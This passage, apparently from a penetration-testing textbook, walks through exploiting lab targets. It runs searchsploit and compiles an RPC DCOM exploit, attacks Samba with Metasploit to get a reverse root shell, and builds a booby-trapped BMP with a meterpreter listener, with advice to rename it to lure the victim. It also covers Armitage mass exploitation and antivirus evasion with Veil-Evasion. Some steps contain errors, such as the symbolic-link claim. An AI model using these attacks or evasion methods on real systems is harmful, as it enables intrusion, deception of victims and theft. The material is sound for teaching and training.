the order of the search terms is important: a search for oracle 10g
will return several exploits, but 10g oracle will not return any. Also,
the script is inconsistently case sensitive; although you are instructed to use
lower case characters in the search term, a search for Bulletproof
FTP returns no hits, bulletproof FTP returns seven hits, and
bulletproof ftp returns no hits. More effective searches of the CSV
file can be conducted using the grep command or a search tool such as
KWrite (apt-get install kwrite).



A search of the local database may identify several possible exploits with a 
description and a path listing; however, these will have to be customized to your 
environment, and then compiled prior to use. Copy the exploit to the /tmp directory 
(the given path does not take into account that the /windows/remote directory 
resides in the /platforms directory). 
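The searchsploit quirks noted above (term order and case matter, and the printed paths omit the /platforms directory) can be avoided with a small search of your own. The following is an added example, not the book's text or the searchsploit script; it assumes the files.csv column layout shown in its docstring and uses constructed index rows.

```python
"""Order-independent, case-insensitive search over the local exploitdb index.

Added example, not the book's text or the searchsploit script it describes.
It works around the two quirks noted above: term order and case matter to
the script, and the paths it prints leave out the /platforms directory.
The index rows below are constructed; they use the column layout assumed
for files.csv (id, file, description, date, author, platform, type, port),
with the file column in the same form the searchsploit screenshot shows.
"""
import csv
import io
import os

EXPLOITDB_ROOT = "/usr/share/exploitdb"   # local copy, as described above
PLATFORMS_DIR = "platforms"               # the directory the printed paths omit

# Constructed sample of files.csv: descriptions taken from the screenshots,
# the last row and all dates/authors are placeholders.
SAMPLE_INDEX = """id,file,description,date,author,platform,type,port
2530,/windows/remote/2530.py,Bulletproof FTP Server 2.4.0.31 Local Privilege Escalation Exploit,2006-01-01,anon,windows,remote,0
7571,/windows/dos/7571.txt,Bulletproof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC),2008-01-01,anon,windows,dos,0
18716,/windows/dos/18716.txt,BulletProof FTP Client 2010 - Buffer Overflow Vulnerability,2012-01-01,anon,windows,dos,0
9999,/windows/remote/9999.c,Constructed Oracle 10g sample entry (placeholder),2007-01-01,anon,windows,remote,0
"""


def resolve_path(index_path, root=EXPLOITDB_ROOT):
    """Turn a printed path such as '/windows/remote/2530.py' into the
    on-disk location under <root>/platforms/."""
    return os.path.join(root, PLATFORMS_DIR, index_path.lstrip("/"))


def search_exploits(index_text, query):
    """Return (description, resolved path) for every row whose description
    contains all of the query's whitespace-separated terms, in any order
    and ignoring case. An empty query matches nothing."""
    terms = [term.lower() for term in query.split()]
    if not terms:
        return []
    hits = []
    for row in csv.DictReader(io.StringIO(index_text)):
        description = row["description"]
        haystack = description.lower()
        if all(term in haystack for term in terms):
            hits.append((description, resolve_path(row["file"])))
    return hits


if __name__ == "__main__":
    # The four queries the tip above says behave differently in searchsploit
    # all behave consistently here.
    for query in ("oracle 10g", "10g oracle", "Bulletproof FTP", "bulletproof ftp"):
        print("%-16s -> %d hit(s)" % (query, len(search_exploits(SAMPLE_INDEX, query))))
    for description, path in search_exploits(SAMPLE_INDEX, "bulletproof ftp"):
        print(" ", path, "|", description)
```

To run it against the real index, read /usr/share/exploitdb/files.csv into index_text instead of SAMPLE_INDEX.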

Exploits presented as scripts such as Perl, Ruby, and PHP are relatively easy to
implement. For example, if the target is a Microsoft IIS 6.0 server that may be vulnerable
to a WebDAV remote authentication bypass, copy the exploit to the root directory and
then execute it as a standard Perl script, as shown in the following screenshot:

root@kali:~# perl 8806.pl

$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
$ written by ka0x <ka0x01 [at] gmail.com>
$ 25/05/2009

usage:
  perl $0 <host> <path>
example:
  perl $0 localhost dir/
  perl $0 localhost dir/file.txt
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Many of the exploits are available as source code that must be compiled before use. 
For example, a search for RPC-specific vulnerabilities identifies several possible 
exploits. An excerpt is shown in the following screenshot: 



root@kali:/usr/share/exploitdb# searchsploit rpc
Description                                               Path
MS Windows RPC Locator Service Remote Exploit             /windows/remote/5.c
MS Windows 2000 RPC DCOM Interface DoS Exploit            /windows/dos/61.c
MS Windows (RPC DCOM) Remote Buffer Overflow Exploit      /windows/remote/64.c
MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets)     /windows/remote/66.c
MS Windows RPC DCOM Remote Exploit (18 Targets)           /windows/remote/69.c
MS Windows (RPC DCOM) Remote Exploit (48 Targets)         /windows/remote/70.c
MS Windows (RPC DCOM) Remote Exploit (Universal Targets)  /windows/remote/76.c



The RPC DCOM vulnerability identified as 76.c is known from practice to be
relatively stable, so we will use it as an example. To compile this exploit, copy it
from the storage directory to the /tmp directory. In that location, compile it using GCC
with the following command:

root@kali:~# gcc 76.c -o 76.exe

This will use the GNU Compiler Collection application to compile 76.c to a file with
the output (-o) name of 76.exe, as shown in the following screenshot:

root@kali:/usr/share/exploitdb/platforms/windows/remote# cp 76.c /tmp
root@kali:/usr/share/exploitdb/platforms/windows/remote# cd /tmp
root@kali:/tmp# ls
76.c
root@kali:/tmp# gcc 76.c -o 76.exe



When you invoke the application against the target, you must call the executable
(which is not stored in the /tmp directory) using a symbolic link as follows:

root@kali:~# ./76.exe

The source code for this exploit is well documented and the required parameters are 
clear at the execution, as shown in the following screenshot: 
root@kali:/tmp# ./76.exe

RPC DCOM exploit coded by .:[oc192.us]:. Security
Usage:
  ./76.exe -d <host> [options]
Options:
  -d  Hostname to attack [Required]
  -t  Type [Default: 0]
  -r  Return address [Default: Selected from target]
  -p  Attack port [Default: 135]
  -l  Bindshell port [Default: 666]
Types:
  0 [0x0018759f]: [Win2k-Universal]
  1 [0x0100139d]: [WinXP-Universal]



Unfortunately, not all exploits from the exploit database and other public sources
compile as readily as 76.c. There are several issues that make the use of such
exploits problematic, even dangerous, for penetration testers, listed as follows:

• Deliberate errors or incomplete source code are commonly encountered as 
experienced developers attempt to keep exploits away from inexperienced 
users, especially beginners who are trying to compromise systems without 
knowing the risks that go with their actions. 

• Exploits are not always sufficiently documented; after all, there is no 
standard that governs the creation and use of code intended to be used 
to compromise a data system. As a result, they can be difficult to use, 
particularly for testers who lack expertise in application development. 

• Inconsistent behaviors due to changing environments (new patches applied 
to the target system and language variations in the target application) may 
require significant alterations to the source code; again, this may require a 
skilled developer. 

• There is always the risk of freely available code containing malicious 
functionalities. A penetration tester may think that he is conducting a 
proof of concept (POC) exercise and will be unaware that the exploit has 
also created a backdoor in the application being tested that could be used by 
the developer. 

To ensure consistent results and create a community of coders who follow consistent 
practices, several exploit frameworks have been developed. The most popular 
exploitation framework is the Metasploit Framework. 
The Metasploit Framework

The Metasploit Framework (MSF) is an open source tool designed to facilitate
penetration testing. Written in the Ruby programming language, it uses a modular
approach to facilitating exploits. This makes it easier to develop and code exploits,
and it also allows for complex attacks to be easily implemented.

MSF can present multiple interfaces to the backend modules that control
exploitation (console, CLI, and web). We will use the console interface for its speed,
because it presents the attack commands, and it has the required configuration
parameters in an easy-to-understand interface. To access this interface, enter
msfconsole in a command prompt or select it from a drop-down menu such as
Top 10 Security Tools. The following screenshot shows the splash screen when the
application launches:



[MSF ASCII-art banner]

Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.7.0-2013082802 [core:4.7 api:1.6]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops



The MSF consists of modules that are combined to effect an exploit. The modules
and their specific functions are as follows:

• Exploits: The code fragments that target specific vulnerabilities. Active 
exploits will exploit a specific target, run until completed, and then exit 
(for example, a buffer overflow). Passive exploits wait for incoming hosts, 
such as web browsers or FTP clients, and exploit them when they connect. 

• Payloads: These are the malicious code that implement commands 
immediately following a successful exploitation. 
• Auxiliary modules: These modules do not establish or directly support
access between the tester and the target system; instead, they perform
related functions such as scanning, fuzzing, or sniffing that support the
exploitation phase.

• Post modules: Following a successful attack, these modules run on 
compromised targets to gather useful data and pivot the attacker deeper 
into the target network. We will learn more about the post modules in 
Chapter 5, Post Exploit - Action on the Objective. 

• Encoders: When exploits must bypass antivirus defenses, these modules 
encode the payload so that it cannot be detected using signature matching 
techniques. 

• No operations (NOPs): These are used to facilitate buffer overflows 
during attacks. 

These modules are used together to conduct reconnaissance and launch attacks 
against targets. The steps for exploiting a target system using MSF can be 
summarized as follows: 

1. Choose and configure an exploit (the code that compromises a specific
vulnerability on the target system).

2. Check the target system to determine if it is susceptible to attack by the
exploit. This step is optional and is usually omitted to minimize
detection.

3. Choose and configure the payload (the code that will be executed on the
target system following a successful exploitation; for example, a reverse
shell from the compromised system back to the source).

4. Choose an encoding technique to bypass detection controls (IDS/IPS or
antivirus software).

5. Execute the exploit.

The next example represents a simple attack against the target Linux-based
operating system Metasploitable2. It is available online at
http://sourceforge.net/projects/metasploitable/files/Metasploitable2. Metasploitable2
was designed to be vulnerable to attack, and it contains known and characterized
vulnerabilities that provide a standard platform for training and for validating
exploit tools.
When installed as a virtual machine (covered in Appendix, Installing Kali Linux),
Metasploitable can be scanned using nmap, which identifies open ports and associated
applications. An excerpt of the nmap scan is shown in the following screenshot:

root@kali:~# nmap -sV 192.168.43.129

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-03 12:25 EDT
Nmap scan report for 192.168.43.129
Host is up (0.00017s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE      VERSION
21/tcp   open  ftp          vsftpd 2.3.4
22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet       Linux telnetd
25/tcp   open  smtp         Postfix smtpd
53/tcp   open  domain       ISC BIND 9.4.2
80/tcp   open  http         Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind      2 (RPC #100000)
139/tcp  open  netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp  open  exec         netkit-rsh rexecd




Several applications were identified by nmap in the preceding example. As a tester,
we should investigate each one for any known vulnerabilities. One of the first places
to start is Metasploit's own collection of exploits. This can be searched from the
command line using:

msf > search samba

The returned exploits for the samba service are listed and each of them is assigned 
a relative ranking of how successful they are at achieving an exploit. The following 
screenshot shows an excerpt of the available samba exploits: 



Matching Modules

   Name                                         Disclosure Date  Rank    Description
   auxiliary/admin/smb/samba_symlink_traversal                   normal  Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                         normal  Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                       normal  Samba lsa_io_trans_names Heap Overflow
   exploit/freebsd/samba/trans2open              2003-04-07       great



[ 100 ] 



Chapter 4 



The exploit/multi/samba/usermap_script exploit was selected for use in 
the remainder of this example because it is ranked as excellent. This ranking was 
determined by the Metasploit development team and identifies how reliably the 
exploit works for a skilled tester against a stable target system. In real life, multiple 
variables (tester skills, protective devices on the network, and modifications to the 
operating system and hosted applications) can work together to significantly alter 
the reliability of the exploit. 

Additional information pertaining to that exploit was obtained using the following
info command:

msf > info exploit/multi/samba/usermap_script

The returned information includes references as well as the information shown in the 
following screenshot: 

msf > info exploit/multi/samba/usermap_script

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  0   Automatic

Basic options:
  Name   Current Setting  Required  Description
  RHOST                   yes       The target address
  RPORT  139              yes       The target port

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulerability in Samba
  versions 3.0.20 through 3.0.25rc3 when using the non-default
  "username map script" configuration option. By specifying a username
  containing shell meta characters, attackers can execute arbitrary
  commands. No authentication is needed to exploit this vulnerability
  since this option is used to map usernames prior to authentication!
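The module description above names two preconditions: an affected Samba version range and the non-default "username map script" option. An administrator can check both from the version string and smb.conf before the host is ever scanned; the following is an added example, not code from the book or from the Metasploit module, and its smb.conf texts and version strings are constructed.

```python
"""Preconditions for the Samba "username map script" issue described above.

Added example, not code from the book or from the Metasploit module. It
checks the two conditions the module description names: a Samba version
from 3.0.20 through 3.0.25rc3, and a non-empty "username map script"
setting in the [global] section of smb.conf. The sample smb.conf texts
and version strings below are constructed.
"""
import re

# Affected range from the module description. Tuples are
# (major, minor, patch, is_final_release, rc_number); a release candidate
# sorts before the final release of the same number.
AFFECTED_LOW = (3, 0, 20, 1, 0)   # 3.0.20
AFFECTED_HIGH = (3, 0, 25, 0, 3)  # 3.0.25rc3

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?")


def version_key(version):
    """Turn '3.0.25rc3' or '3.0.20-Debian' into a sortable tuple.

    Anything after the numeric part and the optional rcN (such as
    '-Debian') is a packaging suffix, not an upstream version, and is ignored.
    """
    match = _VERSION_RE.match(version.strip())
    if match is None:
        raise ValueError("unrecognised Samba version string: %r" % version)
    major, minor, patch, rc = match.groups()
    is_final = 0 if rc else 1
    return (int(major), int(minor), int(patch), is_final, int(rc or 0))


def version_in_affected_range(version):
    return AFFECTED_LOW <= version_key(version) <= AFFECTED_HIGH


def username_map_script_enabled(smb_conf):
    """True when [global] sets 'username map script' to a non-empty value.

    smb.conf parameter names are case-insensitive and ignore internal
    whitespace; lines beginning with '#' or ';' are comments.
    """
    section = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "global" or "=" not in line:
            continue
        name, value = line.split("=", 1)
        if re.sub(r"\s+", "", name).lower() == "usernamemapscript":
            return bool(value.strip())
    return False


def exposed(version, smb_conf):
    """Both conditions must hold for the module's technique to apply."""
    return version_in_affected_range(version) and username_map_script_enabled(smb_conf)


# Constructed samples: the weak configuration and the corrected one.
# Removing the option (or upgrading past 3.0.25rc3) closes the exposure.
WEAK_CONF = """[global]
   workgroup = WORKGROUP
   server string = constructed sample
   Username Map Script = /etc/samba/scripts/mapusers.sh

[homes]
   browseable = no
"""

HARDENED_CONF = """[global]
   workgroup = WORKGROUP
   server string = constructed sample
   ; username map script removed

[homes]
   browseable = no
"""

if __name__ == "__main__":
    for version in ("3.0.20-Debian", "3.0.25rc3", "3.0.25", "3.0.28a"):
        state = "affected" if version_in_affected_range(version) else "not affected"
        print("%-14s %s" % (version, state))
    print("weak config exposed:", exposed("3.0.20-Debian", WEAK_CONF))
    print("hardened config exposed:", exposed("3.0.20-Debian", HARDENED_CONF))
```

The version string can be taken from smbd -V on the host, and the configuration from testparm -s, which prints the effective smb.conf.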
To instruct Metasploit that we will attack the target with this exploit, we issue the
following command:

msf> use exploit/multi/samba/usermap_script 

Metasploit changes the command prompt from msf > to msf exploit 
(usermap_script ) >. 

Metasploit prompts the tester to select the payload (a reverse shell from the 
compromised system back to the attacker) and sets the other variables listed 
as follows: 

• Remote host (RHOST): This is the IP address of the system being attacked 

• Remote port (RPORT): This is the port number that is used for the exploit 

• Local host (LHOST): This is the IP address of the system used to launch 
the attack 

The attack is launched by entering the exploit command at the prompt after all
variables have been set. Metasploit initiates the attack and confirms that a reverse
shell is present by indicating Command shell session 1 opened and giving the IP addresses
that originate and terminate the reverse shell.

To verify that a shell is present, the tester can issue queries for the hostname, 
username (uname -a), and whoami to confirm that the results are specific to the target 
system that is located at a remote location. Take a look at the following screenshot: 

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set RHOST 192.168.14.129
RHOST => 192.168.14.129
msf exploit(usermap_script) > set RPORT 445
RPORT => 445
msf exploit(usermap_script) > set LHOST 192.168.14.128
LHOST => 192.168.14.128
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EBIVvRXgD0ENzz2q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EBIVvRXgD0ENzz2q\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.14.128:4444 -> 192.168.14.129:48108) at 2013-09-02 13:48:49 -0400

hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
When a system is compromised to this extent, it is ready for the post-exploitation
activities (see Chapter 5, Post Exploit - Action on the Objective and Chapter 6, Post Exploit
- Persistence). To add new exploits to Metasploit, in Ruby script (.rb) or Python (.py),
place them in the hidden .msf4 folder located in your home directory, and then
reload msfconsole.

Exploiting a vulnerable application 

The Metasploit Framework is equally effective against vulnerabilities in the
operating system and in third-party applications. In this example, we'll exploit
a buffer overflow vulnerability that was identified in Chasys Draw IES (Version
4.10.01). The vulnerability exists in the ReadFile function, which is used to store
user-provided data in an insecure way. Exploitation results in arbitrary code
execution under the context of the user.

To initiate the attack, the tester needs to generate a specially crafted BMP file and 
then get the victim to open that file in the Chasys application. When this occurs, it 
will compromise the base operating system (effective against Windows XP SP3 and 
Windows 7 SP1). 

The first step is to open msfconsole and set Metasploit to use exploit/windows/
fileformat/chasys_draw_ies_bmp_bof, as shown in the following screenshot:

msf > use exploit/windows/fileformat/chasys_draw_ies_bmp_bof
msf exploit(chasys_draw_ies_bmp_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(chasys_draw_ies_bmp_bof) > set LHOST 192.168.75.130
LHOST => 192.168.75.130
msf exploit(chasys_draw_ies_bmp_bof) > exploit
[+] msf.bmp stored at /root/.msf4/local/msf.bmp



Again, the exploit is a relatively simple exploit. It requires the tester to set a reverse
shell (reverse_tcp) from the compromised system back to the tester's system, the
Local Host (LHOST).

When the exploit is completed, it creates the specially-crafted BMP file, which is
stored with the default name of msf.bmp. To entice the target to open the file and
avoid a default name that may be detected by some devices, it is best to change
the filename to something that is more relevant to the intended target.






Exploit 



The next step is to open a new instance of msfconsole, and set up a listener for
the incoming reverse TCP shell that will originate from the target when it is
compromised. A simple listener is shown in the following screenshot:

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 92.168.75.130
LHOST => 92.168.75.130
msf exploit(handler) > exploit

[-] Handler failed to bind to 92.168.75.130:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...



Once the victim opens the crafted BMP image file in the vulnerable application,
a meterpreter session is opened between the two systems. The msf prompt is
replaced by the meterpreter prompt and the tester can effectively access the remote
system with a command shell. One of the first steps after the compromise is to verify
that you are on the target system; as you can see in the following screenshot, the
sysinfo command identifies the computer name and operating system, verifying a
successful attack:



msf exploit(handler) > exploit

[-] Handler failed to bind to 92.168.75.130:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.75.1
[*] Meterpreter session 1 opened (192.168.75.130:4444 -> 192.168.75.1:2008) at 2014-03-15 01:17:38 -0400

meterpreter > sysinfo
Computer        : DIGITALDEF01
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_CA
Meterpreter     : x86/win32
meterpreter >
Exploiting multiple targets with Armitage

Armitage is frequently overlooked by penetration testers who eschew its GUI 
interface in favor of the traditional command-line input of the Metasploit console. 
However, it possesses Metasploit's functionality while giving visibility to its many 
possible options, making it a good alternative in complex testing environments. 
Unlike Metasploit, it also allows you to test multiple targets at the same time — up to 
512 targets at once. 

To start Armitage, ensure that the database and Metasploit services are started using 
the following command: 

service postgresql start 
service metasploit start 

After that step, enter armitage over the command prompt to execute the command. 
Armitage does not always execute cleanly and it may require the launch steps to be 
repeated to ensure that it is functioning correctly. 

To discover available targets, you can manually add a host by providing its IP 
address or select an nmap scan from the Hosts tab on the menu bar. Armitage can 
also enumerate targets using MSF auxiliary commands or DNS enumeration. 

Armitage can also import host data from the following files: Acunetix, amap, 
AppScan, Burp proxy, Foundstone, Microsoft Baseline Security Analyzer, Nessus 
NBE and XML files, NetSparker, NeXpose, nmap, OpenVas, Qualys, and Retina. 

The initial Armitage start-screen is shown in the following screenshot: 
Armitage allows you to set a host label by selecting a host using a right-click, and
then going to the Host menu and selecting the Set Label... function. This allows you
to flag a particular address or identify it by a common name, which is helpful when
using team-based testing. This process is shown in the following screenshot:

[Host context menu: Set Label... / Remove Host]
[Input dialog: Set label to: Primary Target  (Cancel | OK)]



Armitage also supports dynamic workspaces — a filtered view of the network based 
on network criteria, operating system, open ports and services, and labels. For 
example, you may test a network and identify several servers that do not appear to 
be patched to the extent of the remainder of the network. These can be highlighted 
by giving them a label and then placing them in a priority workspace. 

Once you have identified the target systems that are present on a network, you can 
select specific modules to implement as part of the exploitation process. You can also 
use the Attacks option in the menu bar to find attacks. 

To exploit a host, select it with a right-click, navigate to the Attack item, and choose 
an exploit (make sure that the operating system is set for the correct host; this does 
not always happen automatically). 

One interesting option is Hail Mary, located under the Attacks option. By selecting 
this function, all identified systems are automatically subjected to exploits to achieve 
the greatest number of possible compromises. This is a very noisy attack and should 
therefore be used as a test choice of the last resort. It is also an excellent way to 
determine if an intrusion detection system is implemented and configured properly! 
A system that is compromised shows up as an icon with a red border with electrical
sparks. In the next screenshot, two test systems have been compromised and there
are four active sessions in place between these systems and the tester. The Active
Sessions panel indicates the connections and identifies what exploit was used to
compromise the target. Take a look at the following screenshot that represents the
different options:

Armitage  View  Hosts  Attacks  Workspaces  Help
[Console X] [Workspaces X] [Scan X] [Hail Mary X]

Active sessions
  Information               Connection
  1 shell php               192.168.43.130:45323 -> 192.168.43.129:19838 (192.168.43.129)  exploit/multi/http/php_cgi_arg_injection
  2 meterpreter java/java   192.168.43.130:52826 -> 192.168.43.129:20767 (192.168.43.129)  exploit/multi/misc/java_rmi_server
  3 shell                   192.168.43.130:40725 -> 192.168.43.129:1940 (192.168.43.129)   exploit/unix/irc/unreal_ircd_3281_backdoor
  4 shell                   192.168.43.130:35884 -> 192.168.43.129:6200 (192.168.43.129)   exploit/unix/ftp/vsftpd_234_backdoor




During a penetration test that was conducted, the Hail Mary 
option identified two exploitable vulnerabilities with the target 
and initiated two active sessions. Manual testing with the same 
target eventually identified eight exploitable vulnerabilities, with 
multiple communications channels between the compromised 
system and the tester. Real-world tests of this type reinforce 
the advantages and weaknesses of automated tools during the 
penetration testing process. 



Team testing with Armitage

Armitage is more than a GUI frontend for the Metasploit Framework; it is a
scriptable penetration testing tool that allows a team to use a single instance of the
Metasploit Framework, so that the GUI provides the following functions:

• It uses the same session, allowing one tester to oversee the process, identify 
findings of interest, and control the direction of testing. 

• It runs scripts to automate testing tasks. 
• It shares downloaded files such as password files. This allows one team
member to focus on password cracking, while other team members continue
the exploitation phase.

• It communicates using a shared event log. 

To take advantage of the team configuration, ensure that Armitage is not already
running and then invoke the teamserver script from a console prompt in the
Armitage directory, usually /usr/share/armitage, as follows:

root@kali:/usr/share/armitage# ./teamserver ipaddress password

Ensure that the IP address is correct, as it is not verified by Armitage, and that all 
team members can access the host on port 55553. When you start the Armitage 
team server, it communicates with team members using an SSL certificate; team 
members should verify that the SHA-1 hash of the certificate matches the server's 
SSL certificate. 

Do not connect to 127.0.0.1 when the teamserver script is running, as Armitage
uses that IP address to connect and determine whether it should use SSL
(teamserver or a remote address) or non-SSL (localhost or msfrpcd). To connect
Armitage to teamserver locally, use the external IP address in the Host field.

Users can open one or more command shells, browse files, download data, and take 
screenshots. Shell sessions are automatically locked when in use, and then unlocked. 
However, some meterpreter scripts may fail to function over time. 

To communicate as a team, the View option in the menu opens the shared event log. 
You can make entries onto the log as you would if you were using IRC or some other 
chat room, and the log keeps a permanent record of all comments. 

Scripting the Armitage attack 

Armitage includes the Cortana scripting language, which is based on Sleep, an 
extensible language that resembles Perl. Cortana scripts may define keyboard 
shortcuts, insert menus, and create unique user interfaces. 

Scripts may be run as standalone entities (which requires that the Armitage team 
server be active) or directly from Armitage. To load an existing script, select 
Armitage in the main menu bar, and then select Scripts. A tabbed view will open 
and a button will give you the option to load a script. 

Armitage also provides a scripting environment which is invoked from the View | 
Script Console tab of the menu, as seen in the following screenshot: 
[Console X] [nmap X] [Scripts X] [Cortana X]

cortana> help

Commands
  askoff
  askon
  help
  load
  logoff
  logon
  ls
  proff
  profile
  pron
  reload
  troff
  tron
  unload



A sample script to fully scan target systems using the Metasploit Framework could
be written as scanner.cna. Whenever a new host is added (host_add), the MSF port
scanner will scan for a defined list of TCP ports and for available UDP ports. Take a
look at the following code snippet, which shows the scanner script:

# MSF port scanner
# Cortana event handler: runs each time Armitage adds a host; $1 is the new host's address
on host_add {
    println("[*] MSF Port Scanner New Host OpenPorts on $1");

    # open a Metasploit console and drive it with cmd()
    $console = console();

    # TCP port scan of the new host
    cmd($console, "use auxiliary/scanner/portscan/tcp");
    cmd($console, "set THREADS 12");
    cmd($console, "set PORTS 139, 143");
    # enter other ports as required
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");

    # UDP service sweep of the same host
    cmd($console, "use auxiliary/scanner/discovery/udp_sweep");
    cmd($console, "set THREADS 12");
    cmd($console, "set BATCHSIZE 256");
    cmd($console, "set RHOSTS $1");
    cmd($console, "run -j");

    # pull the results into the Armitage host database
    db_sync();
}

Because Cortana has extensive hooks into the Metasploit Framework, scripts can be 
used to automatically launch exploits, conduct post-exploitation activities, such as 
tracking user activity, and facilitate multiuser activities across the attacker's kill chain. 
Bypassing IDS and antivirus detection

The exploitation phase of the kill chain is the most dangerous one for the penetration
tester or attacker — they are directly interacting with the target network or system
and there is a great chance for their activity to be logged or their identity discovered.
Again, stealth must be employed to minimize risks to the tester. Although no specific
methodology or tool is undetectable, there are some configuration changes and
specific tools that will make detection more difficult.

When considering remote exploits, most networks and systems employ various 
types of defensive controls to minimize the risk of attack. Network devices include 
routers, firewalls, intrusion detection and prevention systems, and malware 
detection software. 

To facilitate exploitation, most frameworks incorporate features to make the attack
somewhat stealthy. The Metasploit Framework allows you to manually set evasion
factors on an exploit-by-exploit basis; however, determining which factors (such
as encryption, port number, filenames, and others) to use can be difficult, and they change for
each particular IDS. The Metasploit Framework also allows communication between
the target and the attacking systems to be encrypted (the windows/meterpreter/
reverse_tcp_rc4 payload), making it difficult for the exploit payload to be detected.

Metasploit Pro, available as a trial on the Kali distribution, includes the following to 
specifically bypass intrusion detection systems: 

• Scan speed can be adjusted in the settings for Discovery Scan, reducing the 
interaction speed with the target by setting the speed to sneaky or paranoid 

• Implement transport evasion by sending smaller TCP packets and increasing 
the transmission time between the packets 

• Reducing the number of simultaneous exploits launched against a 
target system 

• Application-specific evasion options for exploits that involve DCERPC, 
HTTP, and SMB can be automatically set 

Most antivirus software relies on signature matching to locate viruses and other
malware. It examines each executable for strings of code known to be present in
viruses (the signature) and raises an alarm when a suspect string is detected. Many
of Metasploit's attacks rely on files that may possess a signature that, over time, has
been identified by antivirus vendors.

In response to this, the Metasploit Framework allows standalone executables to be
encoded to bypass detection. Unfortunately, extensive testing of these executables at
public sites, such as virustotal.com, has lessened their effectiveness in bypassing
the AV software.
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A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion 
(www.veil-evasion.com), provides more effective protection against the detection 
of standalone exploits. Veil-Evasion aggregates various shellcode injection 
techniques into a framework that simplifies their management. 

As a framework, Veil-Evasion possesses several features, which includes 
the following: 

• It incorporates custom shellcode in a variety of programming languages, 
including C, C#, and Python 

• It can use Metasploit-generated shellcode 

• It can integrate third-party tools such as Hyperion (encrypts an EXE file with 
AES-128 encryption), PEScrambler, and BackDoor Factory 

• The Veil-Evasion evasion.cna script allows Veil-Evasion to be integrated 
into Armitage and its commercial counterpart, Cobalt Strike 

• Payloads can be generated and seamlessly substituted into all PsExec calls 

• Users have the ability to reuse shellcode or implement their own 
encryption methods 

• Its functionality can be scripted to automate deployment 

• Veil-Evasion is under constant development, and the framework has 
been extended with companion tools such as Veil-Catapult (the payload 
delivery system) 

Veil-Evasion can generate an exploit payload; the standalone payloads include the 
following options: 

• Minimal Python installation to invoke shellcode; it uploads a minimal 
Python .zip installation and the 7zip binary. The Python environment is 
unzipped, invoking the shellcode. Since the only files that land on the 
victim are a trusted interpreter and its libraries, file-based AV has nothing 
to match against; the shellcode itself is only ever present in memory. 

• Sethc backdoor, which configures the victim's registry to launch the sticky 
keys RDP backdoor. 

• PowerShell shellcode injector. 

When the payloads have been created, they can be delivered to the target in one of 
the following two ways: 

• Upload and execute using Impacket and PTH toolkit 

• UNC invocation 
Veil-Evasion is available from the Kali repositories and is installed by entering 
apt-get install veil-evasion at a command prompt. 




If you receive any errors during installation, re-run the 
/usr/share/veil-evasion/setup/setup.sh script. 



Veil-Evasion presents the user with the main menu, which shows the number of 
payload modules that are loaded as well as the available commands. Typing list 
will list all available payloads, list langs will list the available language payloads, 
and list <language> will list the payloads for a specific language. Veil-Evasion's 
initial launch screen is shown in the following screenshot: 

    Veil-Evasion | [Version]: 2.4.3
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    Main Menu

        24 payloads loaded

    Available commands:

        use         use a specific payload
        info        information on a specific payload
        list        list available payloads
        update      update Veil to the latest version
        clean       clean out payload folders
        checkvt     check payload hashes vs. VirusTotal
        exit        exit Veil
Veil-Evasion is undergoing rapid development, with significant releases on a 
monthly basis and smaller upgrades occurring more frequently. At the time of 
writing, there are 24 payloads designed to bypass antivirus by employing encryption 
or direct injection into the memory space. These payloads are shown in the next 
screenshot: 

    Veil-Evasion | [Version]: 2.4.3
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

    [*] Available payloads:

        1)  c/meterpreter/rev_tcp
        2)  c/meterpreter/rev_tcp_service
        3)  c/shellcode_inject/virtual
        4)  c/shellcode_inject/void
        5)  cs/meterpreter/rev_tcp
        6)  cs/shellcode_inject/base64_substitution
        7)  cs/shellcode_inject/virtual
        8)  native/Hyperion
        9)  native/backdoor_factory
